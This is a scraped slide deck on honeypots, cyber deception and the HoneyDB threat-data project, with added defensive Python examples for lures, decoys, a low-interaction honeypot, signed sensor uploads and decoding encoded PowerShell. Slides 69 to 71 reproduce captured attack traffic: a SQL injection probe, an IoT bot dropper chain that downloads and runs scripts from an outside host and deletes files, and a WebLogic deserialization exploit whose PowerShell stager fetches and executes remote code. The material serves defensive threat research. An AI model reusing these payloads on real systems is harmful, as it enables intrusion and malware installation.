Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 

Honeypots, Deception, and Frankenstein

  • 8. Honeypots 101 - Production Honeypots
Additional layer to...
Preventative controls
- Network & application firewalls
- Intrusion prevention systems
- Patch management
- Network compartmentalization
- Anti-virus
Detective controls
- Intrusion detection systems
- Network traffic analysis
- Endpoint monitoring
Control validation
- Vulnerability scans
- Audits
- Penetration testing
- Control performance monitoring
Honeypots
- Produce a low volume of data compared to the volume of data from all other preventative and detective controls
  • 9. Honeypots 101 - Research Honeypots
Research honeypots can serve many purposes; it depends on what the research goals are.
Examples:
- Identify sources of malicious traffic
- Discover active malware, botnets, and C&C servers
- Learn about attacker techniques & tools
  • 10. Honeypots 101 - Research Honeypots
[Diagram: a research honeypot exposed to the Internet, drawing traffic from bots, scanners, malware, DDoS, botnets, etc.]
  • 11. Honeypots 101 - Research Honeypots
ShmooCon 2015, Andrew Morris (@Andrew___Morris): No Budget Threat Intelligence - Tracking Malware Campaigns on the Cheap
- Reversing malware
- Uncovering C2 servers
- Uncovering imminent DDoS attacks
Presentation video
Now doing really cool stuff with GreyNoise (https://greynoise.io/)
  • 12. Honeypots 101 - Hobbyist Honeypots
- Try it out.
- It's fun!
[Image captions: "This is not me." / "(this is totally me)"]
  • 14. The First Rule of Cyber Deception
  • 15. [Image: "You Must Show This Image"] (Image Source)
  • 16. Deception
"Deception technology automates the creation of traps (decoys) and/or lures which are mixed among and within existing IT resources to provide a layer of protection to stop attackers that have penetrated the network. Traps (decoys) are IT assets that either use real licensed operating system software, or are emulations of these devices." [1]
1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
  • 17. Deception Automation
Automation for:
- Deploying deception endpoints as VMs, containers, or processes.
- Configuration of deception endpoints.
Centralized management interface, or API driven.
  • 18. Deception Lures
Lures (aka breadcrumbs)
- "Lures are generally real information technology resources (files of varying kinds) which are placed on actual IT assets." [1]
- Credentials to network resources or applications.
- Shortcuts to applications or other services, e.g. FTP, Telnet, SSH.
- Browser artifacts, e.g. history, favorites, cookies.
- Database connection strings
- Network drives
- etc.
1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
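An added example of the credential lure above (not code from the deck or from any deception product): a breadcrumb config file is rendered with a decoy account and a random throwaway password, and an auth log is scanned for any attempt against a decoy account. The decoy account names, the config format, and the sshd log lines are all constructed for the example.

```python
import re
import secrets

# Decoy accounts that exist nowhere real; any use of them means someone is
# replaying a lure. Constructed names, not from the original deck.
DECOY_ACCOUNTS = {"svc_backup", "oracle_ro", "deploy_legacy"}

# Matches the common OpenSSH auth line shape, with or without "invalid user".
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port (?P<port>\d+)"
)


def make_lure(account: str, host: str = "db-legacy.corp.example") -> str:
    """Render a breadcrumb: a stale-looking config with a throwaway password.
    The password is random per render, so the lure itself leaks nothing reusable."""
    password = secrets.token_urlsafe(12)
    return (
        "# backup job credentials (TODO: move to vault)\n"
        f"DB_HOST={host}\nDB_USER={account}\nDB_PASS={password}\n"
    )


def parse_auth_line(line: str):
    m = AUTH_RE.match(line)
    return m.groupdict() if m else None


def detect_lure_use(lines, decoys=DECOY_ACCOUNTS):
    """Every auth attempt against a decoy account is an alert, success or not:
    the credential is fake, but the attempt is a real incident."""
    alerts = []
    for line in lines:
        rec = parse_auth_line(line)
        if rec and rec["user"] in decoys:
            alerts.append({
                "decoy": rec["user"], "src": rec["src"], "host": rec["host"],
                "result": rec["result"], "ts": rec["ts"],
            })
    return alerts


SAMPLE_AUTH_LOG = [  # constructed sshd lines, not from any real system
    "Mar  3 02:11:07 web01 sshd[2211]: Accepted publickey for alice from 10.0.8.15 port 50122 ssh2",
    "Mar  3 02:14:41 web01 sshd[2290]: Failed password for svc_backup from 10.0.5.23 port 51512 ssh2",
    "Mar  3 02:14:43 web01 sshd[2290]: Failed password for invalid user oracle_ro from 10.0.5.23 port 51514 ssh2",
    "Mar  3 02:15:02 web01 sshd[2301]: Accepted password for bob from 10.0.8.20 port 50130 ssh2",
]

if __name__ == "__main__":
    print(make_lure("svc_backup"))
    for alert in detect_lure_use(SAMPLE_AUTH_LOG):
        print("ALERT", alert)
```

Because the decoy accounts never exist on the real hosts, the detection needs no tuning: one match is one alert, which is what makes lure data "low volume, high value".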
  • 19. Deception Solutions
Very fancy implementations of honeypots
  • 20. Deception Layers
Network services - SSH, Telnet, FTP, etc.
Applications - cookies, directories, logins, functionality, etc.
Data - watermarks, triggers, records access, etc.
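An added example of the application layer from the list above (not from the deck or any product): a tiny request handler that advertises decoy directories through robots.txt, alerts on any request into them, and issues a role cookie that looks editable but carries a MAC, so a tampered value is proof of deliberate manipulation. The decoy paths, cookie key and response codes are assumptions made for the example.

```python
import hashlib
import hmac

COOKIE_KEY = b"constructed-cookie-key"  # assumption: a server-side secret
# Never linked from the real app; only scanners and robots.txt readers find them.
DECOY_PATHS = {"/backup/", "/old-admin/", "/.git/config"}


def sign_role(role: str) -> str:
    """Cookie value 'role.mac': the role is readable, the MAC makes it tamper-evident."""
    mac = hmac.new(COOKIE_KEY, role.encode(), hashlib.sha256).hexdigest()[:16]
    return f"{role}.{mac}"


def check_role(cookie: str):
    """Returns (role, tampered). Constant-time compare, so the check itself
    does not leak how close a forged MAC was."""
    role, _, mac = cookie.partition(".")
    if hmac.compare_digest(sign_role(role), f"{role}.{mac}"):
        return role, False
    return None, True


def parse_cookies(header: str) -> dict:
    out = {}
    for part in header.split(";"):
        key, _, value = part.strip().partition("=")
        if key:
            out[key] = value
    return out


class DecoyApp:
    def __init__(self):
        self.alerts = []  # in production this is the honeypot log sink

    def handle(self, method: str, path: str, cookie_header: str = "", remote_ip: str = "0.0.0.0"):
        cookies = parse_cookies(cookie_header)
        if path == "/robots.txt":
            # The lure: "Disallow" lines that a curious scanner will walk straight into.
            body = "User-agent: *\n" + "".join(f"Disallow: {p}\n" for p in sorted(DECOY_PATHS))
            return 200, body
        if path in DECOY_PATHS or any(path.startswith(p) for p in DECOY_PATHS if p.endswith("/")):
            self.alerts.append({"kind": "decoy_path", "path": path, "src": remote_ip})
            return 403, "Forbidden"  # looks like a real locked-down directory
        if "role" in cookies:
            role, tampered = check_role(cookies["role"])
            if tampered:
                self.alerts.append({"kind": "cookie_tamper", "value": cookies["role"], "src": remote_ip})
                return 401, "Unauthorized"
        return 200, "OK"


if __name__ == "__main__":
    app = DecoyApp()
    print(app.handle("GET", "/robots.txt")[1])
    app.handle("GET", "/backup/db.sql", remote_ip="198.51.100.7")  # constructed probe
    app.handle("GET", "/", f"role=admin.{sign_role('user').split('.')[1]}", remote_ip="198.51.100.7")
    print(app.alerts)
```

The two alerts are different in kind: a decoy path hit says someone is enumerating, a cookie MAC failure says someone is actively trying to escalate. Both go to the same low-volume log, and neither can be triggered by a legitimate user by accident.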
  • 21. Deception in Applications
2017, Herb Todd: Tangled Web: Defense in Deception
- The goals of deception from the perspective of both the attacker and defender
- The elements and processes needed to plan, prepare, execute, and monitor effective deception
- The types of deception techniques that are effective and how they translate into actual web application capabilities
- How to identify and respond to various types of attackers.
Presentation video
My takeaway - a tailored solution is needed
  • 23. Deception Goal
Integrate deception throughout your network and applications so you become a high risk to attackers
  • 24. Deception Market
- Approximately 20 companies
- Raised at least 201 million dollars
- Top 5 funded range from 19 million to 46 million
- 2 acquisitions
- All this over the last 4, maybe 5 years
Numbers based on data from crunchbase.com as of Fall 2017
  • 25. Deception Challenges
The concept of honeypots & deception has been around for years.
The Cuckoo's Egg - 1989
Bsides Raleigh 2017 (now Bsides RDU) (source)
  • 26. Deception Challenges
Why isn't everyone already doing deception?
  • 28. Deception Challenges
Over the last 10 to 15 years organizations have focused on getting the basics done...
● Vulnerability Assessment
● Patch Management
● Endpoint protection
● Network Monitoring (IDS/IPS)
● Controls Validation
● Security awareness / training
Deception
● No resources
● Not a priority
● Not fully understood
  • 29. Deception Challenges
However, as organizations become more mature in their security programs, they are now thinking about deception...
What does a deception program look like for their organization?
  • 30. Deception Program
Initial thoughts...
● Scope... intruder vs. insider, or both?
● Output... alerts vs. counter intelligence, or both?
● Coverage... external vs. internal, or both?
● Assets... network, applications, data?
● Validation... metrics and testing.
● Incident response... integration and prioritization.
● Audit & Compliance?
  • 31. Deception Challenges
Some other challenges...
● Some existing solutions are heavy to deploy.
● Lure & breadcrumb management.
● Vulnerability scans reporting on sensors.
● Deception data risk (the data is fake, the incident is real).
● External-facing deception can have an impact on your security scorecard.
● How to implement deception in 3rd-party vendor environments.
  • 32. Deception Takeaways
Get the basics covered first
Think about your deception story (program)
Investigate solutions that are right-sized for your organization's maturity level
A solution needs to:
- have the capability to be tailored
- be easy to deploy
- be easy to automate and integrate
- be lightweight / low touch to manage
  • 35. HoneyPy
- Low to medium interaction honeypot.
- Plugin based, to implement various network services (TCP or UDP).
- Open source, on GitHub: https://github.com/foospidy/HoneyPy
- Written in Python.
- Plugins - https://github.com/foospidy/HoneyPy/tree/master/plugins
- Service config - https://github.com/foospidy/HoneyPy/blob/master/etc/services.cfg
- Integrations (loggers) - https://github.com/foospidy/HoneyPy/tree/master/loggers
June Meetup
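An added example of what a low-interaction TCP service does, written for this page rather than taken from HoneyPy (it does not use HoneyPy's plugin interface): the decoy sends a banner, records whatever the client sends as one JSON event with the payload hex-encoded, and then closes, so there is no login and nothing to exploit behind the banner. The service structure, event fields and the loopback probe are assumptions made for the example.

```python
import asyncio
import json
import time
from dataclasses import dataclass


@dataclass
class EmulatedService:
    """A low-interaction decoy: a banner and a log sink, nothing behind it.
    (Hypothetical structure, not HoneyPy's plugin interface.)"""
    name: str
    port: int                 # 0 = let the OS pick (used by probe() below)
    banner: bytes             # what the real service would send on connect
    read_timeout: float = 2.0
    max_bytes: int = 4096


def make_event(service: EmulatedService, peer, data: bytes) -> dict:
    """One honeypot event. Attacker bytes are stored hex-encoded, not as text,
    so a hostile payload is never interpreted by whatever consumes the log."""
    return {
        "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "service": service.name,
        "remote_ip": peer[0],
        "remote_port": peer[1],
        "bytes": len(data),
        "data_hex": data.hex(),
    }


def handler_for(service: EmulatedService, sink: list):
    async def handle(reader: asyncio.StreamReader, writer: asyncio.StreamWriter):
        peer = writer.get_extra_info("peername")
        writer.write(service.banner)          # look like the service...
        await writer.drain()
        try:                                   # ...then only listen
            data = await asyncio.wait_for(reader.read(service.max_bytes), service.read_timeout)
        except asyncio.TimeoutError:
            data = b""
        sink.append(make_event(service, peer, data))
        writer.close()                         # no login, no commands, ever
        await writer.wait_closed()
    return handle


async def probe_once(service: EmulatedService, payload: bytes):
    """Start the decoy on loopback, connect to it once as a client, and return
    (banner the client saw, event the honeypot logged)."""
    events: list = []
    server = await asyncio.start_server(handler_for(service, events), "127.0.0.1", service.port)
    port = server.sockets[0].getsockname()[1]
    reader, writer = await asyncio.open_connection("127.0.0.1", port)
    banner = await reader.readexactly(len(service.banner))
    writer.write(payload)
    await writer.drain()
    writer.close()
    await writer.wait_closed()
    for _ in range(200):                       # let the handler finish logging
        if events:
            break
        await asyncio.sleep(0.01)
    server.close()
    await server.wait_closed()
    return banner, (events[0] if events else None)


def probe(service: EmulatedService, payload: bytes):
    return asyncio.run(probe_once(service, payload))


if __name__ == "__main__":
    telnet = EmulatedService(name="telnet", port=0, banner=b"\r\nlogin: ")
    seen_banner, event = probe(telnet, b"root\r\n")   # constructed probe
    print(json.dumps(event))
```

Keeping the payload hex-encoded and never echoing it is the "low risk" part of low interaction: the event is safe to ship to a logger, a database or a dashboard without a second round of escaping.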
  • 36. HoneyDB
HoneyDB is a community-driven honeypot data aggregation service. HoneyDB collects and publishes honeypot data via its web site and APIs.
honeydb.io (redirects to riskdiscovery.com/honeydb)
  • 37. HoneyDB - Features
Data visualization
  • 39. HoneyDB - Features
Threat Info API
- Bad-hosts
- Sensor Data
- Twitter Threat Feed
Tools...
- API Wrapper / CLI: https://github.com/foospidy/honeydb-python
- Console: https://github.com/NullArray/Mimir
  • 41. HoneyDB - Original Architecture
[Diagram: Web, API]
  • 42. HoneyDB - Scale Problem
[Diagram: Web, API]
  • 43. HoneyDB - Reliability Problem
Fun reading...
http://www.cloudatacost.com/mystory
https://www.reddit.com/r/CloudAtCost/
  • 44. HoneyDB - $$$?
Decent web servers and data storage could run about $400-$500 per month.
Current 90-day storage: 50 GB
  • 45. HoneyDB - How To Get $$$?
Idea... Honeypots As A Service (HaaS)
  • 46. HoneyDB - How To Get $$$?
Idea... Honeypots As A Service (HaaS)
  • 47. HoneyDB - You Have To HaaS it!
  • 48. HoneyDB - Turns Out...
You Don't Have To HaaS it! Or nobody wants to HaaS it =(
  • 49. HoneyDB - But Wait, CarolinaCon Connection!
http://novcon.net/
Offered VMs for free!
btw... they also operate the threat info project.
  • 50. HoneyDB - Reliable Servers
But still need to scale
  • 52. HoneyDB - Frankenstein Cloud Architecture
"Frankenstein scaaaaaaaaaaaaale" - Frankenstein
  • 53. HoneyDB - Frankenstein Cloud Architecture
[Diagram]
  • 54. HoneyDB - Frankenstein Cloud Architecture
[Architecture diagram. Components: serverless functions; Google Cloud BigQuery; Google Cloud Pub/Sub; Novcon VMs hosting the HoneyDB web/API, MySQL (Primary) and MySQL (Secondary). Flows labelled: get hmac, post events, pull events, pull tweets, replicate, query, inserts, stream events, TBD.]
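The diagram labels an agent-side "get hmac" step before "post events", but the deck does not spell out the scheme. As an added example (not HoneyDB's protocol or code), here is one way a serverless ingest function can authenticate sensor submissions: a per-sensor secret, an HMAC-SHA256 over the sensor id, a timestamp and the hash of the canonical JSON body, verified with a constant-time compare and a freshness window so a captured request cannot be replayed. The header names, secret table and skew window are assumptions.

```python
import hashlib
import hmac
import json
import time

# Hypothetical per-sensor secrets, as the receiving function would look them up.
SENSOR_SECRETS = {"sensor-0042": b"constructed-secret-do-not-reuse"}
MAX_SKEW = 300  # seconds a signed request stays valid (assumption)


def canonical_body(events) -> bytes:
    """Stable serialisation so agent and verifier hash identical bytes."""
    return json.dumps(events, sort_keys=True, separators=(",", ":")).encode()


def _message(sensor_id: str, ts: int, body: bytes) -> bytes:
    # Binding sensor id and timestamp into the MAC stops a valid signature
    # from being re-used by another sensor or at another time.
    return f"{sensor_id}\n{ts}\n".encode() + hashlib.sha256(body).digest()


def sign_request(sensor_id: str, secret: bytes, events, ts=None):
    """Agent side: returns (headers, body) ready to POST."""
    ts = int(time.time()) if ts is None else ts
    body = canonical_body(events)
    mac = hmac.new(secret, _message(sensor_id, ts, body), hashlib.sha256).hexdigest()
    headers = {"X-Sensor-Id": sensor_id, "X-Timestamp": str(ts), "X-Signature": mac}
    return headers, body


def verify_request(headers: dict, body: bytes, secrets=SENSOR_SECRETS, now=None):
    """Function side: returns (accepted, reason). Rejects unknown sensors,
    stale timestamps (replay) and any body/metadata change."""
    now = int(time.time()) if now is None else now
    sensor_id = headers.get("X-Sensor-Id", "")
    secret = secrets.get(sensor_id)
    if secret is None:
        return False, "unknown sensor"
    try:
        ts = int(headers.get("X-Timestamp", ""))
    except ValueError:
        return False, "bad timestamp"
    if abs(now - ts) > MAX_SKEW:
        return False, "stale request"
    expected = hmac.new(secret, _message(sensor_id, ts, body), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, headers.get("X-Signature", "")):
        return False, "bad signature"
    return True, "ok"


SAMPLE_EVENTS = [  # constructed honeypot events, not real sensor data
    {"service": "telnet", "remote_ip": "203.0.113.9", "data_hex": "726f6f740d0a"},
]

if __name__ == "__main__":
    hdrs, body = sign_request("sensor-0042", SENSOR_SECRETS["sensor-0042"], SAMPLE_EVENTS)
    print(hdrs)
    print(verify_request(hdrs, body))
```

The freshness check is the part most often left out: without it, anyone who captures one signed POST (for example from a sensor on a hostile network) can re-submit it indefinitely and pollute the aggregated data.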
  • 55. HoneyDB - What about... Blockchain?
  • 57. HoneyDB - Note On Serverless Functions
IBM Cloud Functions is THE BEST - deploys easily/quickly, lowest cost.
AWS Lambda is good - robust, but expensive... API gateway charges.
Google Cloud Functions is disappointing - easy to deploy, only Node.js, but... Google functions using the Google library talking to Google Pub/Sub resulted in tons of errors. Wait. What? Why?
Azure Cloud Functions is WTF - couldn't get dependencies to install, never got it running, couldn't waste more time with it.
  • 58. HoneyDB - Ok, So What Does It Cost?
  • 59. HoneyDB - Ok, So What Does It Cost?
  • 60. HoneyDB - How To Money?
Cryptocurrency Mining...
  • 61. HoneyDB - How To Money?
Not practical, but wrote a cool script... HoneyMiner: https://github.com/foospidy/HoneyMiner
  • 62. HoneyDB - How To Money?
Masternodes...
- Greater privacy of transactions
- Performing immediate transactions
- Participation in proceedings and voting
- Activate budgeting and cashier system in cryptocurrencies
  • 63. HoneyDB - How To Money?
Currently running 5 masternodes across 2 VPS. Yields about $100 to $200 per month.
  • 64. HoneyDB - But that crypto though.
Masternodes have potential, but require an initial investment and are at the mercy of market volatility.
  • 65. HoneyDB - How to money?
Other options...
- Sponsorships
- Commercial Licensing
  • 66. HoneyDB - Back To HaaS
Tools to get you honeypotting
● Honeydb-agent
  ○ Like HoneyPy, but a binary
● API Endpoints
● HoneyDB CLI
  • 67. HoneyDB - New API Endpoints
● Bad-host (filtered)
● Sensor Data Count (filtered)
● Sensor Data (filtered)
Filtered means it's only the data from your sensors.
  • 68. HoneyDB - New API Client Wrapper and CLI
pip install honeydb

    usage: honeydb [-h] [--bad-hosts] [--sensor-data-count] [--sensor-data]
                   [--threatbin] [--twitter-threat-feed] [--mydata]
                   [--date DATE] [--ip-address IP_ADDRESS] [--from-id FROM_ID]
                   [--pretty]

    optional arguments:
      -h, --help              show this help message and exit
      --bad-hosts             Get bad hosts.
      --sensor-data-count     Get sensor data count.
      --sensor-data           Get sensor data.
      --threatbin             Get ThreatBin entries.
      --twitter-threat-feed   Get Twitter Threat Feed.
      --mydata                Filter on mydata.
      --date DATE             Date in format YYYY-MM-DD
      --ip-address IP_ADDRESS IP address to filter on.
      --from-id FROM_ID       ID to continue retrieving sensor data.
      --pretty                Print JSON in pretty format.
  • 69. HoneyDB - Examples...
Web (SQL injection probe):
    GET /hcl/inc/install/checkout.asp?cartid1111111111111'%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)--%20%20 HTTP/1.1
    Host: x.x.x.x
    Accept: */*

Telnet (IoT bot dropper chain):
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.76.233.99/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.76.233.99 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.76.233.99; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.76.233.99 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
  • 70. HoneyDB - Examples...
    POST /wls-wsat/CoordinatorPortType HTTP/1.1
    Host: 64.137.163.142:7001
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
    Connection: Close
    Content-Type: text/xml
    Content-Length: 1216

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java version="1.8.0_131" class="java.beans.XMLDecoder">
            <void class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="3">
                <void index="0"><string>cmd.exe</string></void>
                <void index="1"><string>/c</string></void>
                <void index="2"><string>PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuADsAJABXAEMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVwBDAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAiAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADIALgAwACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMwAuADUAOQAuADYAOAAuADEANwAyAC8AQwBhAGMAaABlAC8ARABMAC4AcABoAHAAJwApADsA</string></void>
              </array>
              <void method="start"/>
            </void>
          </java>
        </work:WorkContext>
      </soapenv:Header>
(the request body is cut off on the slide at this point)
  • 71. HoneyDB - Examples...
Decoded -E argument as UTF-16LE (each dot is the NUL high byte of a character):
    $.O.S.=.(.G.e.t.-.W.m.i.O.b.j.e.c.t. .-.C.l.a.s.s. .W.i.n.3.2._.O.p.e.r.a.t.i.n.g.S.y.s.t.e.m.)...C.a.p.t.i.o.n.;.$.W.C.=.N.e.w.-.O.b.j.e.c.t. .N.e.t...W.e.b.C.l.i.e.n.t.;.$.W.C...H.e.a.d.e.r.s...A.d.d.(.'.U.s.e.r.-.A.g.e.n.t.'.,.".P.o.w.e.r.S.h.e.l.l. .v.2...0. .$.O.S.".).;.I.E.X. .$.W.C...D.o.w.n.l.o.a.d.S.t.r.i.n.g.(.'.h.t.t.p.:././.1.2.3...5.9...6.8...1.7.2./.C.a.c.h.e./.D.L...p.h.p.'.).;.
The same command as plain text:
    $OS=(Get-WmiObject -Class Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers.Add('User-Agent',"PowerShell v2.0 $OS");IEX $WC.DownloadString('http://123.59.68.172/Cache/DL.php');
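An added triage helper for captures like the one above (written for this page; not HoneyDB tooling): it pulls the `-E`/`-EncodedCommand` argument out of a command line, repairs the line-wrapping and missing padding that captured Base64 often has, decodes it as UTF-16LE the way PowerShell does, and extracts the download URL and the download-and-execute pattern for the analyst. The command line constant is the argv recovered from the captured `<string>` elements on the slide, joined as the shell would see them; the flag-matching rule (any unambiguous prefix of `-EncodedCommand`) is the example's own assumption.

```python
import base64
import re

# argv from the captured <string> elements on the slide above, joined as one
# command line. Only the Base64 blob matters to the decoder.
CAPTURED_CMDLINE = (
    "cmd.exe /c PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E "
    "JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALg"
    "BDAGEAcAB0AGkAbwBuADsAJABXAEMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVwBDAC4ASABlAGEAZABlAHIAc"
    "wAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAiAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADIALgAwACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQw"
    "AuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMwAuADUAOQAuADYAOAAuADEANwAyAC8AQwBhAGMAaABlAC8ARABMAC4"
    "AcABoAHAAJwApADsA"
)

# -e, -ec, -enc, -encoded, -encodedcommand (assumption: prefixes PowerShell accepts);
# "-EP ByPass" is not matched because no whitespace follows the "-E".
ENC_FLAG_RE = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"""https?://[^\s'"()<>]+""", re.I)


def find_encoded_command(cmdline: str):
    m = ENC_FLAG_RE.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is Base64 of the script as UTF-16LE; the dotted text on
    the slide is that UTF-16LE with its NUL bytes shown as dots. Captured blobs
    often arrive line-wrapped or unpadded, so repair both before decoding."""
    cleaned = re.sub(r"\s+", "", b64)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned).decode("utf-16-le")


def triage(cmdline: str) -> dict:
    """Decode the command and pull the indicators an analyst wants first."""
    b64 = find_encoded_command(cmdline)
    if b64 is None:
        return {"encoded": False, "script": None, "urls": [], "downloads_and_runs": False}
    script = decode_encoded_command(b64)
    return {
        "encoded": True,
        "script": script,
        "urls": URL_RE.findall(script),
        # the classic stager shape: fetch a string and hand it straight to IEX
        "downloads_and_runs": "DownloadString" in script
        and re.search(r"\bIEX\b", script, re.I) is not None,
    }


if __name__ == "__main__":
    result = triage(CAPTURED_CMDLINE)
    print(result["script"])
    print(result["urls"], result["downloads_and_runs"])
```

Decoding before anything else matters because the Base64 hides every string an IOC match would catch: the download host, the User-Agent the stager sets, and the `IEX` that tells you this is a loader rather than the payload itself.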
  • 72. HoneyDB - @MalwareMechanic
● I analyzed the initial POST you sent me. From there I was able to pull apart a scanner/worm/RAT!
● It appears to be GhostMiner to mine Monero!
  • 73. HoneyDB - Hmmmmm...
$ cat GhostMiner >> HoneyMiner
  • 74. HoneyDB - No no no no...
  • 75. HoneyDB - @MalwareMechanic
● This POST utilizes a Java deserialization vulnerability to execute a base64 encoded PowerShell command.
● This in turn downloads and executes a PowerShell script (hxxp://123.59.68.172/Cache/DL.php).
● Installs a cryptominer via WMI.
● Attempts to stop the various services & tasks before installing the new miner.
● Attempts to stop other miners.
● Attempts to stop processes listening on specific ports.
● Also saw references to powershell_reflective_mimikatz.
  • 76. HoneyDB - Go Forth and Honeypot!
honeydb.io
Thanks! Questions?